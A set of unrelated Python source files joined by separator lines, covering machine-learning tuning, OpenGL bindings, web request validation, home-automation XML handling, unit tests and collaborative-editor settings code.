# wait for a random interval between 2 and 5 seconds
self.sleep(random.uniform(2,5))
# show the crosshair and keep it
self.crosshair(duration=3,block=False)
rt = self.watchfor('enter',3)
if not rt:
self.write('Timeout! You didn''t make it.',2,fg=(1,0,0,1))
elif len(rt) > 1:
self.write('Oops, you pressed more than one time.',2,fg=(1,0,0,1))
else:
self.write('Your reaction time was %g seconds.' % rt[0], duration=2, fg = ((0,1,0,1) if rt[0]<0.5 else (1,1,0,1)))
all_reaction_times.append(rt[0])
self.write('Your average reaction time was %g seconds.\nHit the space bar to end the experiment.' % (sum(all_reaction_times)/len(all_reaction_times)),'space')
|
"""
-*- test-case-name: PyHouse.src.Modules.families.UPB.test.test_Device_UPB -*-
@name: PyHouse/src/Modules/families/UPB/UPB_xml.py
@author: D. Brian Kimmel
@contact: [email protected]
@copyright: (c) 2014-2015 by D. Brian Kimmel
@license: MIT License
@note: Created on Aug 6, 2014
@summary: This module is for communicating with UPB controllers.
"""
# Import system type stuff
# Import PyMh files
from Modules.Families.UPB.UPB_data import UPBData
from Modules.Utilities.xml_tools import PutGetXML, stuff_new_attrs
from Modules.Computer import logging_pyh as Logger
g_debug = 9
LOG = Logger.getLogger('PyHouse.UPB_xml ')
class Xml(object):
@staticmethod
def ReadXml(p_device_obj, p_in_xml):
"""
@param p_in_xml: is the e-tree XML house object
@param p_house: is the text name of the House.
@return: a dict of the entry to be attached to a house object.
"""
l_obj = UPBData()
l_obj.UPBAddress = PutGetXML.get_int_from_xml(p_in_xml, 'UPBAddress', 255)
l_obj.UPBNetworkID = PutGetXML.get_int_from_xml(p_in_xml, 'UPBNetworkID')
l_obj.UPBPassword = PutGetXML.get_int_from_xml(p_in_xml, 'UPBPassword')
stuff_new_attrs(p_device_obj, l_obj)
return l_obj # for testing
@staticmethod
def WriteXml(p_out_xml, p_device_obj):
try:
PutGetXML.put_int_element(p_out_xml, 'UPBAddress', p_device_obj.UPBAddress)
PutGetXML.put_int_element(p_out_xml, 'UPBNetworkID', p_device_obj.UPBNetworkID)
PutGetXML.put_int_element(p_out_xml, 'UPBPassword', p_device_obj.UPBPassword)
except AttributeError as e_err:
LOG.error('InsertDeviceXML ERROR {}'.format(e_err))
# ## END DBK
|
import logging
import optuna
import optuna.integration.lightgbm as lgb
import pandas as pd
from catboost import CatBoostClassifier
from lightgbm import LGBMClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import (RepeatedStratifiedKFold, StratifiedKFold,
cross_val_score)
from sklearn.tree import DecisionTreeClassifier
from xgboost import XGBClassifier, XGBRegressor, plot_importance
from instrumentum.model_tuning._optuna_dispatchers import optuna_param_disp
logger = logging.getLogger(__name__)
def _opt_generic_objective(X, y, trial, estimator, cv, metric):
param = optuna_param_disp[estimator.__name__](trial)
estimator = estimator(**param)
score = cross_val_score(estimator, X=X, y=y, cv=cv, scoring=metric).mean()
trial_n = len(trial.study.trials)
best_score = (
score
if trial_n == 1 or score > trial.study.best_value
else trial.study.best_value
)
logger.info("Trials: %s, Best Score: %s, Score %s", trial_n, best_score, score)
return score
def wrapper_opt(
X,
y,
estimator=None,
metric="roc_auc",
n_trials=5,
verbose=logging.INFO,
return_fit=True,
direction="maximize",
cv_splits=5,
cv_repeats=1,
):
# Our Logger
logger.setLevel(verbose)
# Let's turn off the verbosity of optuna
optuna.logging.set_verbosity(optuna.logging.ERROR)
cv = RepeatedStratifiedKFold(n_splits=cv_splits, n_repeats=cv_repeats)
estimator = estimator or DecisionTreeClassifier
logger.info("Estimator received: %s, trials: %s\n", estimator.__name__, n_trials)
study = optuna.create_study(direction=direction)
study.optimize(
lambda trial: _opt_generic_objective(
trial=trial,
X=X,
y=y,
estimator=estimator,
cv=cv,
metric=metric,
),
n_trials=n_trials,
)
estimator = estimator(**study.best_params)
return_fit and estimator.fit(X, y)
return study.best_trial.value, estimator
def wrapper_opt_lgbm(
X, y, metric="auc", time_budget=120, verbose=logging.INFO, return_fit=False
):
# Our Logger
logger.setLevel(verbose)
# Let's turn off the verbosity of optuna and lighgbm
optuna.logging.set_verbosity(optuna.logging.ERROR)
no_logger = logging.getLogger("sd")
no_logger.addHandler(logging.NullHandler())
lgb.register_logger(no_logger)
def log_trials(std, frz_trial):
logger.info(
"\nTrials: %s, Iteration Score: %s", len(std.trials), std.best_value
)
params = {
"objective": "binary",
"metric": metric,
"boosting_type": "gbdt",
"seed": 42,
}
dtrain = lgb.Dataset(X, label=y)
rkf = RepeatedStratifiedKFold(
n_splits=10,
n_repeats=2,
random_state=42,
)
study_tuner = optuna.create_study(direction="maximize")
tuner = lgb.LightGBMTunerCV(
params,
dtrain,
study=study_tuner,
time_budget=time_budget,
seed=42,
optuna_callbacks=[log_trials],
show_progress_bar=False,
folds=rkf,
)
tuner.run()
lgbm = LGBMClassifier(**tuner.best_params)
return_fit and lgbm.fit(X, y)
return tuner.best_score, lgbm
|
import numpy as np
from rosenbrock_helper import f
from rosenbrock_helper import f_prime_x0
from rosenbrock_helper import f_prime_x1
from rosenbrock_helper import plot_rosenbrock
np.random.seed(0)
def main():
x0=np.random.uniform(-2.0,2.0)
x1=np.random.uniform(-2.0,2.0)
x_start = (x0,x1)
y_start = f(x0,x1)
print (f"Global minimum: {(1,1)}")
print(f"X_start: {(x0,x1)}")
print(f"Y_start: {y_start}")
plot_rosenbrock(x_start)
learning_rate = 0.005
num_iterations = 1000
gradient_steps = []
for it in range(num_iterations):
x0 = x0 - f_prime_x0(x0,x1) * learning_rate
x1 = x1 - f_prime_x1(x0,x1) * learning_rate
y = f(x0,x1)
if it % 10 ==0 :
print(f" x0, x1 = {(x0,x1)}, y = {y}")
gradient_steps.append((x0,x1))
x_end = (x0,x1)
y_end = f(x0,x1)
print(f"x0 end, x1 end = {(x_end)}, y end = {(y_end)}")
plot_rosenbrock(x_start, gradient_steps)
if __name__ == "__main__":
main() |
'''Autogenerated by get_gl_extensions script, do not edit!'''
from OpenGL import platform as _p, constants as _cs, arrays
from OpenGL.GL import glget
import ctypes
EXTENSION_NAME = 'GL_VERSION_GL_1_5'
def _f( function ):
return _p.createFunction( function,_p.GL,'GL_VERSION_GL_1_5',False)
_p.unpack_constants( """GL_BUFFER_SIZE 0x8764
GL_BUFFER_USAGE 0x8765
GL_QUERY_COUNTER_BITS 0x8864
GL_CURRENT_QUERY 0x8865
GL_QUERY_RESULT 0x8866
GL_QUERY_RESULT_AVAILABLE 0x8867
GL_ARRAY_BUFFER 0x8892
GL_ELEMENT_ARRAY_BUFFER 0x8893
GL_ARRAY_BUFFER_BINDING 0x8894
GL_ELEMENT_ARRAY_BUFFER_BINDING 0x8895
GL_VERTEX_ATTRIB_ARRAY_BUFFER_BINDING 0x889F
GL_READ_ONLY 0x88B8
GL_WRITE_ONLY 0x88B9
GL_READ_WRITE 0x88BA
GL_BUFFER_ACCESS 0x88BB
GL_BUFFER_MAPPED 0x88BC
GL_BUFFER_MAP_POINTER 0x88BD
GL_STREAM_DRAW 0x88E0
GL_STREAM_READ 0x88E1
GL_STREAM_COPY 0x88E2
GL_STATIC_DRAW 0x88E4
GL_STATIC_READ 0x88E5
GL_STATIC_COPY 0x88E6
GL_DYNAMIC_DRAW 0x88E8
GL_DYNAMIC_READ 0x88E9
GL_DYNAMIC_COPY 0x88EA
GL_SAMPLES_PASSED 0x8914
GL_SRC1_ALPHA 0x8589
GL_VERTEX_ARRAY_BUFFER_BINDING 0x8896
GL_NORMAL_ARRAY_BUFFER_BINDING 0x8897
GL_COLOR_ARRAY_BUFFER_BINDING 0x8898
GL_INDEX_ARRAY_BUFFER_BINDING 0x8899
GL_TEXTURE_COORD_ARRAY_BUFFER_BINDING 0x889A
GL_EDGE_FLAG_ARRAY_BUFFER_BINDING 0x889B
GL_SECONDARY_COLOR_ARRAY_BUFFER_BINDING 0x889C
GL_FOG_COORDINATE_ARRAY_BUFFER_BINDING 0x889D
GL_WEIGHT_ARRAY_BUFFER_BINDING 0x889E
GL_FOG_COORD_SRC 0x8450
GL_FOG_COORD 0x8451
GL_CURRENT_FOG_COORD 0x8453
GL_FOG_COORD_ARRAY_TYPE 0x8454
GL_FOG_COORD_ARRAY_STRIDE 0x8455
GL_FOG_COORD_ARRAY_POINTER 0x8456
GL_FOG_COORD_ARRAY 0x8457
GL_FOG_COORD_ARRAY_BUFFER_BINDING 0x889D
GL_SRC0_RGB 0x8580
GL_SRC1_RGB 0x8581
GL_SRC2_RGB 0x8582
GL_SRC0_ALPHA 0x8588
GL_SRC2_ALPHA 0x858A""", globals())
glget.addGLGetConstant( GL_QUERY_COUNTER_BITS, (1,) )
glget.addGLGetConstant( GL_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_ELEMENT_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_VERTEX_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_NORMAL_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_COLOR_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_INDEX_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_TEXTURE_COORD_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_EDGE_FLAG_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_SECONDARY_COLOR_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_SRC, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_ARRAY_TYPE, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_ARRAY_STRIDE, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_ARRAY, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_ARRAY_BUFFER_BINDING, (1,) )
@_f
@_p.types(None,_cs.GLsizei,arrays.GLuintArray)
def glGenQueries( n,ids ):pass
@_f
@_p.types(None,_cs.GLsizei,arrays.GLuintArray)
def glDeleteQueries( n,ids ):pass
@_f
@_p.types(_cs.GLboolean,_cs.GLuint)
def glIsQuery( id ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint)
def glBeginQuery( target,id ):pass
@_f
@_p.types(None,_cs.GLenum)
def glEndQuery( target ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLintArray)
def glGetQueryiv( target,pname,params ):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLintArray)
def glGetQueryObjectiv( id,pname,params ):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLuintArray)
def glGetQueryObjectuiv( id,pname,params ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint)
def glBindBuffer( target,buffer ):pass
@_f
@_p.types(None,_cs.GLsizei,arrays.GLuintArray)
def glDeleteBuffers( n,buffers ):pass
@_f
@_p.types(None,_cs.GLsizei,arrays.GLuintArray)
def glGenBuffers( n,buffers ):pass
@_f
@_p.types(_cs.GLboolean,_cs.GLuint)
def glIsBuffer( buffer ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLsizeiptr,ctypes.c_void_p,_cs.GLenum)
def glBufferData( target,size,data,usage ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLintptr,_cs.GLsizeiptr,ctypes.c_void_p)
def glBufferSubData( target,offset,size,data ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLintptr,_cs.GLsizeiptr,ctypes.c_void_p)
def glGetBufferSubData( target,offset,size,data ):pass
@_f
@_p.types(ctypes.c_void_p,_cs.GLenum,_cs.GLenum)
def glMapBuffer( target,access ):pass
@_f
@_p.types(_cs.GLboolean,_cs.GLenum)
def glUnmapBuffer( target ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLintArray)
def glGetBufferParameteriv( target,pname,params ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLvoidpArray)
def glGetBufferPointerv( target,pname,params ):pass
|
r"""
Gradient Accumulator
====================
Change gradient accumulation factor according to scheduling.
Trainer also calls ``optimizer.step()`` for the last indivisible step number.
"""
from pytorch_lightning.callbacks.base import Callback
class GradientAccumulationScheduler(Callback):
r"""
Change gradient accumulation factor according to scheduling.
Args:
scheduling: scheduling in format {epoch: accumulation_factor}
Example::
>>> from pytorch_lightning import Trainer
>>> from pytorch_lightning.callbacks import GradientAccumulationScheduler
# at epoch 5 start accumulating every 2 batches
>>> accumulator = GradientAccumulationScheduler(scheduling={5: 2})
>>> trainer = Trainer(callbacks=[accumulator])
# alternatively, pass the scheduling dict directly to the Trainer
>>> trainer = Trainer(accumulate_grad_batches={5: 2})
"""
def __init__(self, scheduling: dict):
super().__init__()
if not scheduling: # empty dict error
raise TypeError("Empty dict cannot be interpreted correct")
for key in scheduling:
if not isinstance(key, int) or not isinstance(scheduling[key], int):
raise TypeError("All epoches and accumulation factor must be integers")
minimal_epoch = min(scheduling.keys())
if minimal_epoch < 0:
raise IndexError(f"Epochs indexing from 1, epoch {minimal_epoch} cannot be interpreted correct")
if minimal_epoch != 0: # if user didnt define first epoch accumulation factor
scheduling.update({0: 1})
self.scheduling = scheduling
self.epochs = sorted(scheduling.keys())
def on_epoch_start(self, trainer, pl_module):
epoch = trainer.current_epoch
for i in reversed(range(len(self.epochs))):
if epoch >= self.epochs[i]:
trainer.accumulate_grad_batches = self.scheduling.get(self.epochs[i])
break
|
# Implementacion generica de Arboles de Decisiones.
from math import log, inf, sqrt
from B_GenericDecisionTree import DecisionTree
from random import randint
class RandomForest:
def __init__(self, X, Y, atr_types, atr_names, num_trees):
self.X = X
self.Y = Y
self.atr_types = atr_types
self.atr_names = atr_names
# Numero de arboles a usar.
self.num_trees = num_trees
# Arboles
self.trees = []
def train(self, splits=-1):
""" Entrenamos los distintos arboles. """
for i in range(self.num_trees):
# Escogemos los datos de entrenamiento de forma aleatoria
N = len(self.X)
X_i, Y_i = [], []
for _ in range(N):
k = randint(0, N-1)
X_i.append(self.X[k])
Y_i.append(self.Y[k])
# Escogemos los atributos a deshabilitar de forma aleatoria
N = len(self.atr_types)
M = int(sqrt(N))
atr = [j for j in range(M)]
atr_avail = [1]*N
for _ in range(M):
k = randint(0, len(atr)-1)
atr_avail[atr.pop(k)] = 0
# Escogemos uno de los criterios de forma aleatoria
criterios = ["Gini", "Entropy"]
c = criterios[randint(0,1)]
# Creamos un nuevo arbol
t = DecisionTree(X_i.copy(), Y_i.copy(), self.atr_types, self.atr_names, atr_avail.copy())
t.train(splits, c)
self.trees.append(t)
print(str(i) + "-esimo Arbol de Decision entrenado!")
def predict(self, x, trees = None):
""" Ponemos a los arboles a votar y la etiqueta con mas votos sera retornada. """
if trees == None: trees = self.trees
dic = {}
for t in trees:
r = t.predict(x)
if not r in dic: dic[r] = 1
else: dic[r] += 1
max_v = 0
v = None
for d in dic:
if dic[d] > max_v:
max_v = dic[d]
v = d
return v
def OOB(self):
""" Verificamos la calidad del random forest usando el metodo Out Of Bag. """
acc, N = 0, 0
for i, x in enumerate(self.X):
trees = []
for t in self.trees:
if not x in t.X: trees.append(t)
if len(trees) > 0:
N += 1
if self.predict(x, trees) == self.Y[i][0]: acc += 1
if N == 0: return -1
return acc/N
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from collections import namedtuple
from contextlib import contextmanager
import functools
import logging
import re
from pyramid.interfaces import IRoutesMapper
import jsonschema.exceptions
import simplejson
from pyramid_swagger.exceptions import RequestValidationError
from pyramid_swagger.exceptions import ResponseValidationError
from pyramid_swagger.model import PathNotMatchedError
log = logging.getLogger(__name__)
DEFAULT_EXCLUDED_PATHS = [
r'^/static/?',
r'^/api-docs/?'
]
class Settings(namedtuple(
'Settings',
[
'schema',
'validate_request',
'validate_response',
'validate_path',
'exclude_paths',
'exclude_routes',
]
)):
"""A settings object for configuratble options.
:param schema: a :class:`pyramid_swagger.model.SwaggerSchema`
:param validate_swagger_spec: check Swagger files for correctness.
:param validate_request: check requests against Swagger spec.
:param validate_response: check responses against Swagger spec.
:param validate_path: check if request path is in schema. If disabled
and path not found in schema, request / response validation is skipped.
:param exclude_paths: list of paths (in regex format) that should be
excluded from validation.
:rtype: namedtuple
:param exclude_routes: list of route names that should be excluded from
validation.
"""
@contextmanager
def noop_context(request, response=None):
yield
def _get_validation_context(registry):
validation_context_path = registry.settings.get(
'pyramid_swagger.validation_context_path',
)
if validation_context_path:
m = re.match(
'(?P<module_path>.*)\.(?P<contextmanager_name>.*)',
validation_context_path,
)
module_path = m.group('module_path')
contextmanager_name = m.group('contextmanager_name')
return getattr(
__import__(module_path, fromlist=contextmanager_name),
contextmanager_name,
)
else:
return noop_context
def validation_tween_factory(handler, registry):
"""Pyramid tween for performing validation.
Note this is very simple -- it validates requests, responses, and paths
while delegating to the relevant matching view.
"""
settings = load_settings(registry)
route_mapper = registry.queryUtility(IRoutesMapper)
def validator_tween(request):
# We don't have access to this yet but let's go ahead and build the
# matchdict so we can validate it and use it to exclude routes from
# validation.
route_info = route_mapper(request)
if should_exclude_request(settings, request, route_info):
return handler(request)
validation_context = _get_validation_context(registry)
try:
validator_map = settings.schema.validators_for_request(request)
except PathNotMatchedError as exc:
if settings.validate_path:
with validation_context(request):
raise RequestValidationError(str(exc))
else:
return handler(request)
if settings.validate_request:
request_data = handle_request(
PyramidSwaggerRequest(request, route_info),
validation_context,
validator_map)
def swagger_data(_):
return request_data
request.set_property(swagger_data)
response = handler(request)
if settings.validate_response:
with validation_context(request, response=response):
validate_response(response, validator_map.response)
return response
return validator_tween
class PyramidSwaggerRequest(object):
"""Adapter for a :class:`pyramid.request.Request` which exposes request
data for casting and validation.
"""
FORM_TYPES = [
'application/x-www-form-urlencoded',
'multipart/form-data',
]
def __init__(self, request, route_info):
self.request = request
self.route_info = route_info
@property
def query(self):
return self.request.GET
@property
def path(self):
return self.route_info.get('match') or {}
@property
def headers(self):
return self.request.headers
@property
def form(self):
# Don't read the POST dict unless the body is form encoded
if self.request.headers.get('Content-Type') in self.FORM_TYPES:
return self.request.POST
return {}
@property
def body(self):
return getattr(self.request, 'json_body', {})
def handle_request(request, validation_context, validator_map):
"""Validate the request against the swagger spec and return a dict with
all parameter values available in the request, casted to the expected
python type.
:param request: a :class:`PyramidSwaggerRequest` to validate
:param validation_context: a context manager for wrapping validation
errors
:param validator_map: a :class:`pyramid_swagger.load_schema.ValidatorMap`
used to validate the request
:returns: a :class:`dict` of request data for each parameter in the swagger
spec
"""
request_data = {}
validation_pairs = []
for validator, values in [
(validator_map.query, request.query),
(validator_map.path, request.path),
(validator_map.form, request.form),
(validator_map.headers, request.headers),
]:
values = cast_params(validator.schema, values)
validation_pairs.append((validator, values))
request_data.update(values)
# Body is a special case because the key for the request_data comes
# from the name in the schema, instead of keys in the values
if validator_map.body.schema:
param_name = validator_map.body.schema['name']
validation_pairs.append((validator_map.body, request.body))
request_data[param_name] = request.body
with validation_context(request):
validate_request(validation_pairs)
return request_data
def load_settings(registry):
return Settings(
schema=registry.settings['pyramid_swagger.schema'],
validate_request=registry.settings.get(
'pyramid_swagger.enable_request_validation',
True
),
validate_response=registry.settings.get(
'pyramid_swagger.enable_response_validation',
True
),
validate_path=registry.settings.get(
'pyramid_swagger.enable_path_validation',
True
),
exclude_paths=get_exclude_paths(registry),
exclude_routes=set(registry.settings.get(
'pyramid_swagger.exclude_routes',
) or []),
)
def get_exclude_paths(registry):
"""Compiles a list of paths that should not be validated against.
:rtype: list of compiled validation regexes
"""
# TODO(#63): remove deprecated `skip_validation` setting in v2.0.
regexes = registry.settings.get(
'pyramid_swagger.skip_validation',
registry.settings.get(
'pyramid_swagger.exclude_paths',
DEFAULT_EXCLUDED_PATHS
)
)
# being nice to users using strings :p
if not isinstance(regexes, list) and not isinstance(regexes, tuple):
regexes = [regexes]
return [re.compile(r) for r in regexes]
def should_exclude_request(settings, request, route_info):
disable_all_validation = not any((
settings.validate_request,
settings.validate_response,
settings.validate_path
))
return (
disable_all_validation or
should_exclude_path(settings.exclude_paths, request.path) or
should_exclude_route(settings.exclude_routes, route_info)
)
def should_exclude_path(exclude_path_regexes, path):
# Skip validation for the specified endpoints
return any(r.match(path) for r in exclude_path_regexes)
def should_exclude_route(excluded_routes, route_info):
return (
route_info.get('route') and
route_info['route'].name in excluded_routes
)
def validation_error(exc_class):
def decorator(f):
@functools.wraps(f)
def _validate(*args, **kwargs):
try:
return f(*args, **kwargs)
except jsonschema.exceptions.ValidationError as exc:
# This will alter our stack trace slightly, but Pyramid knows
# how to render it. And the real value is in the message
# anyway.
raise exc_class(str(exc))
return _validate
return decorator
CAST_TYPE_TO_FUNC = {
'integer': int,
'float': float,
'boolean': bool,
}
def cast_request_param(param_type, param_name, param_value):
"""Try to cast a request param (e.g. query arg, POST data) from a string to
its specified type in the schema. This allows validating non-string params.
:param param_type: name of the type to be casted to
:type param_type: string
:param param_name: param name
:type param_name: string
:param param_value: param value
:type param_value: string
"""
try:
return CAST_TYPE_TO_FUNC.get(param_type, lambda x: x)(param_value)
except ValueError:
log.warn("Failed to cast %s value of %s to %s",
param_name, param_value, param_type)
# Ignore type error, let jsonschema validation handle incorrect types
return param_value
@validation_error(RequestValidationError)
def validate_request(validation_pairs):
for validator, values in validation_pairs:
validator.validate(values)
def cast_params(schema, values):
if not schema:
return {}
def get_type(param_name):
return schema['properties'].get(param_name, {}).get('type')
return dict(
(k, cast_request_param(get_type(k), k, v))
for k, v in values.items()
)
@validation_error(ResponseValidationError)
def validate_response(response, validator):
"""Validates response against our schemas.
:param response: the response object to validate
:type response: :class:`pyramid.response.Response`
:param validator: validator for the response
:type validator: :class`:pyramid_swagger.load_schema.SchemaValidator`
"""
# Short circuit if we are supposed to not validate anything.
if (
validator.schema.get('type') == 'void' and
response.body in (None, b'', b'{}', b'null')
):
return
validator.validate(prepare_body(response))
def prepare_body(response):
# content_type and charset must both be set to access response.text
if response.content_type is None or response.charset is None:
raise ResponseValidationError(
'Response validation error: Content-Type and charset must be set'
)
if 'application/json' in response.content_type:
return simplejson.loads(response.text)
else:
return response.text
|
# encoding: utf-8
from __future__ import unicode_literals
import pytest
from emails.backend.factory import ObjectFactory
def test_object_factory():
class A:
""" Sample class for testing """
def __init__(self, a, b=None):
self.a = a
self.b = b
factory = ObjectFactory(cls=A)
obj1 = factory[{'a': 1, 'b': 2}]
assert isinstance(obj1, A)
assert obj1.a == 1
assert obj1.b == 2
obj2 = factory[{'a': 1, 'b': 2}]
assert obj2 is obj1
obj3 = factory[{'a': 100}]
assert obj3 is not obj1
obj4 = factory.invalidate({'a': 100})
assert obj3 != obj4
assert obj3.a == obj4.a
with pytest.raises(ValueError):
factory[42]
|
import smart_imports
smart_imports.all()
class Client(client.Client):
__slots__ = ()
def message_to_protobuf(self, message):
raise NotImplementedError
def protobuf_to_message(self, pb_message):
raise NotImplementedError
def cmd_push_message(self, account_id, message, size):
operations.async_request(url=self.url('push-message'),
data=tt_protocol_diary_pb2.PushMessageRequest(account_id=account_id,
message=self.message_to_protobuf(message),
diary_size=size))
def cmd_version(self, account_id):
answer = operations.sync_request(url=self.url('version'),
data=tt_protocol_diary_pb2.VersionRequest(account_id=account_id),
AnswerType=tt_protocol_diary_pb2.VersionResponse)
return answer.version
def cmd_diary(self, account_id):
answer = operations.sync_request(url=self.url('diary'),
data=tt_protocol_diary_pb2.DiaryRequest(account_id=account_id),
AnswerType=tt_protocol_diary_pb2.DiaryResponse)
return {'version': answer.diary.version,
'messages': [self.protobuf_to_message(pb_message) for pb_message in answer.diary.messages]}
|
import os
from pathlib import Path
from unittest import TestCase
from metabase_manager.exceptions import InvalidConfigError
from metabase_manager.parser import Group, MetabaseParser, User
class MetabaseParserTests(TestCase):
def test_from_paths(self):
"""
Ensure MetabaseParser.from_paths() returns an instance of MetabaseParser
with registered config.
"""
path_users = os.path.join(
os.path.dirname(__file__), "fixtures/parser/users.yaml"
)
path_groups = os.path.join(
os.path.dirname(__file__), "fixtures/parser/subdirectory/groups.yml"
)
parser = MetabaseParser.from_paths([path_users, path_groups])
self.assertIsInstance(parser, MetabaseParser)
self.assertSetEqual(
{"Administrators", "Developers", "Read-Only"}, set(parser._groups.keys())
)
self.assertSetEqual(
{"[email protected]", "[email protected]"}, set(parser._users.keys())
)
self.assertTrue(all([isinstance(u, User) for u in parser.users]))
self.assertTrue(all([isinstance(g, Group) for g in parser.groups]))
def test_load_yaml(self):
"""Ensure MetabaseParser.load_yaml() opens and loads a yaml file into a dictionary."""
filepath = os.path.join(os.path.dirname(__file__), "fixtures/parser/users.yaml")
users = MetabaseParser.load_yaml(filepath)
self.assertIsInstance(users, dict)
def test_parse_yaml(self):
"""Ensure MetabaseParser.parse_yaml() registers all objects of all types in the yaml file."""
# has both users and groups
filepath = os.path.join(os.path.dirname(__file__), "fixtures/parser/users.yaml")
objects = MetabaseParser.load_yaml(filepath)
conf = MetabaseParser()
self.assertEqual(0, len(conf.users))
self.assertEqual(0, len(conf.groups))
conf.parse_yaml(objects)
self.assertEqual(2, len(conf.users))
self.assertEqual(1, len(conf.groups))
def test_parse_yaml_raises_error(self):
"""Ensure MetabaseParser.parse_yaml() raises InvalidConfigError when unexpected keys are found."""
parser = MetabaseParser()
with self.assertRaises(InvalidConfigError):
parser.parse_yaml({"unknown": {"something": ""}})
def test_register_objects(self):
"""Ensure MetabaseParser.register_objects() registers all objects of the same type in a list of dicts."""
objects = [{"name": "Administrators"}, {"name": "Developers"}]
conf = MetabaseParser()
self.assertEqual(0, len(conf._groups.keys()))
conf.register_objects(objects, "groups")
self.assertEqual(2, len(conf._groups.keys()))
self.assertIsInstance(conf._groups["Administrators"], Group)
self.assertIsInstance(conf._groups["Developers"], Group)
def test_register_object(self):
"""Ensure MetabaseParser.register_object() registers an object to the instance with the correct key."""
user = User(first_name="", last_name="", email="foo")
conf = MetabaseParser()
conf.register_object(user, "users")
self.assertEqual(conf._users["foo"], user)
def test_register_object_raises_on_duplicate_key(self):
"""Ensure MetabaseParser.register_object() raises an error if the object_key already exists."""
user = User(first_name="", last_name="", email="[email protected]")
conf = MetabaseParser()
conf.register_object(user, "users")
with self.assertRaises(KeyError):
conf.register_object(user, "users")
|
import os
import errno
import json
import re
import hashlib
import time
import webbrowser
from functools import wraps
from urllib.parse import urlparse
from .. import editor
from . import shared as G
from .exc_fmt import str_e
from . import msg
from .lib import DMP
class JOIN_ACTION(object):
PROMPT = 1
UPLOAD = 2
DOWNLOAD = 3
class FlooPatch(object):
def __init__(self, current, buf):
self.buf = buf
self.current = current
self.previous = buf['buf']
if buf['encoding'] == 'base64':
self.md5_before = hashlib.md5(self.previous).hexdigest()
self.md5_after = hashlib.md5(self.current).hexdigest()
else:
try:
self.md5_before = hashlib.md5(self.previous.encode('utf-8')).hexdigest()
except Exception as e:
# Horrible fallback if for some reason encoding doesn't agree with actual object
self.md5_before = hashlib.md5(self.previous).hexdigest()
msg.log('Error calculating md5_before for ', str(self), ': ', str_e(e))
try:
self.md5_after = hashlib.md5(self.current.encode('utf-8')).hexdigest()
except Exception as e:
# Horrible fallback if for some reason encoding doesn't agree with actual object
self.md5_after = hashlib.md5(self.current).hexdigest()
msg.log('Error calculating md5_after for ', str(self), ': ', str_e(e))
def __str__(self):
return '%s - %s' % (self.buf['id'], self.buf['path'])
def patches(self):
return DMP.patch_make(self.previous, self.current)
def to_json(self):
patches = self.patches()
if len(patches) == 0:
return None
patch_str = ''
for patch in patches:
patch_str += str(patch)
return {
'id': self.buf['id'],
'md5_after': self.md5_after,
'md5_before': self.md5_before,
'path': self.buf['path'],
'patch': patch_str,
'name': 'patch'
}
def reload_settings():
floorc_settings = load_floorc_json()
for name, val in list(floorc_settings.items()):
setattr(G, name, val)
validate_auth(G.AUTH)
if G.SHARE_DIR:
G.BASE_DIR = G.SHARE_DIR
G.BASE_DIR = os.path.realpath(os.path.expanduser(G.BASE_DIR))
G.COLAB_DIR = os.path.join(G.BASE_DIR, 'share')
G.COLAB_DIR = os.path.realpath(G.COLAB_DIR)
if G.DEBUG:
msg.LOG_LEVEL = msg.LOG_LEVELS['DEBUG']
else:
msg.LOG_LEVEL = msg.LOG_LEVELS['MSG']
mkdir(G.COLAB_DIR)
return floorc_settings
def load_floorc_json():
# Expose a few settings for curious users to tweak
s = {
'expert_mode': False,
'debug': False,
}
try:
with open(G.FLOORC_JSON_PATH, 'r') as fd:
floorc_json = fd.read()
except IOError as e:
if e.errno == errno.ENOENT:
return s
raise
try:
default_settings = json.loads(floorc_json)
except ValueError:
return s
for k, v in list(default_settings.items()):
s[k.upper()] = v
return s
def save_floorc_json(s):
floorc_json = {}
for k, v in list(s.items()):
floorc_json[k.lower()] = v
msg.log('Writing ', floorc_json)
with open(G.FLOORC_JSON_PATH, 'w') as fd:
fd.write(json.dumps(floorc_json, indent=4, sort_keys=True, separators=(',', ': ')))
def validate_auth(auth):
if type(auth) != dict:
msg.error('floorc.json validation error: Auth section is not an object!')
return False
to_delete = []
for k, v in list(auth.items()):
if type(v) != dict:
msg.error('floorc.json validation error: host "', k, '" has invalid auth credentials. Did you put a setting in the auth section?')
to_delete.append(k)
break
for key in ['username', 'api_key', 'secret']:
if not v.get(key):
msg.error('floorc.json validation error: host "', k, '" missing "', key, '"')
to_delete.append(k)
break
for k in to_delete:
del auth[k]
return len(to_delete) == 0
def can_auth(host=None):
if host is None:
host = len(G.AUTH) and list(G.AUTH.keys())[0] or G.DEFAULT_HOST
auth = G.AUTH.get(host)
if type(auth) == dict:
return bool((auth.get('username') or auth.get('api_key')) and auth.get('secret'))
return False
cancelled_timeouts = set()
timeout_ids = set()
def set_timeout(func, timeout, *args, **kwargs):
return _set_timeout(func, timeout, False, *args, **kwargs)
